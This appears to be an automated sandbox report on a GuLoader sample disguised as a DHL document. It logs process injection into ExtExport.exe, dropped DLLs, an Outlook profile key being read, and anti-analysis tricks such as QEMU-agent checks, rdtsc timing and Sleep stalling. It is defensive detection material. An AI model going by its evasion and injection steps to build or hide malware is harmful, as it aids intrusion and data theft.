Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_0337B847	2_2_0337B847
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03372446	2_2_03372446
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03390044	2_2_03390044
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_033714B7	2_2_033714B7
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_0337B4B7	2_2_0337B4B7
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_033728A6	2_2_033728A6
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_033770A6	2_2_033770A6
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_033708A3	2_2_033708A3
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_033724AE	2_2_033724AE
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03384CF8	2_2_03384CF8
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03372CE3	2_2_03372CE3
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_033700E0	2_2_033700E0
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_033720EF	2_2_033720EF
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_033704DF	2_2_033704DF
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03370CDC	2_2_03370CDC
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_033728C7	2_2_033728C7
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A08897	37_2_02A08897
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A079DC	37_2_02A079DC
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A03D68	37_2_02A03D68
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A206A9	37_2_02A206A9
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A03CB1	37_2_02A03CB1
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A02EBF	37_2_02A02EBF
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A1B885	37_2_02A1B885
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A03CE9	37_2_02A03CE9
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A058EE	37_2_02A058EE
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A03CFA	37_2_02A03CFA
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A046C1	37_2_02A046C1
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A08CC9	37_2_02A08CC9
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A1CEDD	37_2_02A1CEDD
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A05A20	37_2_02A05A20
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A03421	37_2_02A03421
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A0422B	37_2_02A0422B
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A08231	37_2_02A08231
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A04035	37_2_02A04035
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A0423A	37_2_02A0423A
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A08A3A	37_2_02A08A3A
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A05A6B	37_2_02A05A6B
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A0866E	37_2_02A0866E
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A1DE76	37_2_02A1DE76
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A04279	37_2_02A04279
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A08241	37_2_02A08241
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A08A4E	37_2_02A08A4E
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A04656	37_2_02A04656
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A1C85C	37_2_02A1C85C
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A1AFAA	37_2_02A1AFAA
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A04BAE	37_2_02A04BAE
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A057B8	37_2_02A057B8
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A04B9A	37_2_02A04B9A
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A03DE6	37_2_02A03DE6
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A057EC	37_2_02A057EC
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A1B3C6	37_2_02A1B3C6
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A083D0	37_2_02A083D0
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A047D6	37_2_02A047D6
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A0412A	37_2_02A0412A
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A1CD06	37_2_02A1CD06
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A08509	37_2_02A08509
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A03F1A	37_2_02A03F1A
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A05B71	37_2_02A05B71
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A04376	37_2_02A04376
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A08179	37_2_02A08179
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A08D40	37_2_02A08D40
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A04353	37_2_02A04353

Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A1FE97 NtCreateThreadEx,	37_2_02A1FE97
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A08897 NtProtectVirtualMemory,	37_2_02A08897
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A065BA NtSetInformationProcess,	37_2_02A065BA
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A03D68 NtProtectVirtualMemory,	37_2_02A03D68
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A03CB1 NtProtectVirtualMemory,	37_2_02A03CB1
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A03CE9 NtProtectVirtualMemory,	37_2_02A03CE9
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A03CFA NtProtectVirtualMemory,	37_2_02A03CFA
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A0422B NtProtectVirtualMemory,	37_2_02A0422B
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A04035 NtProtectVirtualMemory,	37_2_02A04035
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A0423A NtProtectVirtualMemory,	37_2_02A0423A
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A04279 NtProtectVirtualMemory,	37_2_02A04279
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A08A4E NtProtectVirtualMemory,	37_2_02A08A4E
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A03DE6 NtProtectVirtualMemory,	37_2_02A03DE6
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A0412A NtProtectVirtualMemory,	37_2_02A0412A
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A08932 NtProtectVirtualMemory,	37_2_02A08932
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A0890D NtProtectVirtualMemory,	37_2_02A0890D
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A03F1A NtProtectVirtualMemory,	37_2_02A03F1A
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A04376 NtProtectVirtualMemory,	37_2_02A04376

Source: C:\Users\user\Desktop\documentos DHL.exe	Section loaded: edgegdi.dll			Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Section loaded: edgegdi.dll			Jump to behavior

Source: libpixbufloader-icns.dll.2.dr

Static PE information: Number of sections : 11 > 10

Source: documentos DHL.exe

ReversingLabs: Detection: 17%

Source: C:\Users\user\Desktop\documentos DHL.exe

File read: C:\Users\user\Desktop\documentos DHL.exe

Jump to behavior

Source: documentos DHL.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\documentos DHL.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\documentos DHL.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\documentos DHL.exe

2_2_00403489

Source: C:\Users\user\Desktop\documentos DHL.exe

File created: C:\Users\user\Zorillinae

Jump to behavior

Source: C:\Users\user\Desktop\documentos DHL.exe

File created: C:\Users\user\AppData\Local\Temp\nsd3BF7.tmp

Jump to behavior

Source: classification engine

Classification label: mal88.troj.spyw.evad.winEXE@45/6@2/2

Source: C:\Users\user\Desktop\documentos DHL.exe

Code function: 2_2_004020FE CoCreateInstance,

2_2_004020FE

Source: C:\Users\user\Desktop\documentos DHL.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\documentos DHL.exe

Code function: 2_2_00404814 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

2_2_00404814

Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe

Mutant created: \Sessions\1\BaseNamedObjects\28278665D4ACB73EF64D459A

Source: C:\Users\user\Desktop\documentos DHL.exe

File written: C:\Windows\Resources\0409\Transcriptive.ini

Jump to behavior

Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source: documentos DHL.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000025.00000002.1820565807.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.1618126975.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1824658615.0000000003370000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_10002DE0 push eax; ret	2_2_10002E0E
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_0337977F push cs; iretd	2_2_03379780
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03375F4D push ss; retf	2_2_03375F4E
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03373FEA push ss; retf	2_2_0337407F
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_03376225 push FFFFFFE5h; ret	2_2_03376227
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_033765ED push ecx; retf	2_2_033765EE
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A00CAC push ss; retf	37_2_02A00D41
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A032AF push ecx; retf	37_2_02A032B0
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A02C0F push ss; retf	37_2_02A02C10
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Code function: 37_2_02A06441 push cs; iretd	37_2_02A06442

Source: libpixbufloader-icns.dll.2.dr

Static PE information: section name: .xdata

Source: C:\Users\user\Desktop\documentos DHL.exe

Code function: 2_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

2_2_10001B18

Source: C:\Users\user\Desktop\documentos DHL.exe	File created: C:\Users\user\Zorillinae\Skaalpundet\Inkbslistes\Tset\Demodulationen\Iagttagerposition\libpixbufloader-icns.dll			Jump to dropped file
Source: C:\Users\user\Desktop\documentos DHL.exe	File created: C:\Users\user\AppData\Local\Temp\nsw5DC6.tmp\System.dll			Jump to dropped file

Source: C:\Users\user\Desktop\documentos DHL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found stalling execution ending in API Sleep call

Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe

Stalling execution: Execution stalls by calling Sleep

graph_37-6069

Tries to detect Any.run

Source: C:\Users\user\Desktop\documentos DHL.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\documentos DHL.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ExtExport.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Source: C:\Users\user\Desktop\documentos DHL.exe

Dropped PE file which has not been started: C:\Users\user\Zorillinae\Skaalpundet\Inkbslistes\Tset\Demodulationen\Iagttagerposition\libpixbufloader-icns.dll

Jump to dropped file

Source: C:\Users\user\Desktop\documentos DHL.exe

Code function: 2_2_0337133E rdtsc

2_2_0337133E

Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_004066F3 FindFirstFileW,FindClose,	2_2_004066F3
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_00405ABE CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	2_2_00405ABE
Source: C:\Users\user\Desktop\documentos DHL.exe	Code function: 2_2_00402862 FindFirstFileW,	2_2_00402862

Source: C:\Users\user\Desktop\documentos DHL.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\documentos DHL.exe	API call chain: ExitProcess graph end node			graph_2-21143
Source: C:\Users\user\Desktop\documentos DHL.exe	API call chain: ExitProcess graph end node			graph_2-21148

